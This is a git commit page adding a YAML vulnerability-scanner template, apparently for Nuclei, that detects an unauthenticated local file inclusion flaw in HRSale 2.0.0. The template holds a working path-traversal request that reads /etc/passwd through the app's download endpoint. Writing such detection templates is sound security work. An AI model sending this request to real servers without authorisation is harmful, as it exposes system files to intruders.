Merge pull request #3131 from Akokonunes/patch-70

Create hrsale-unauthenticated-lfi.yaml
patch-1
Prince Chaddha 2021-11-13 23:46:11 +05:30 committed by GitHub
commit 4eb84d7802
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 0 deletions

View File

@ -0,0 +1,24 @@
id: hrsale-unauthenticated-lfi
info:
name: Hrsale 2.0.0 - Hrsale Unauthenticated Lfi
author: 0x_Akoko
severity: high
description: This exploit allow you to download any readable file from server without permission and login session
reference: https://www.exploit-db.com/exploits/48920
tags: hrsale,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/download?type=files&filename=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200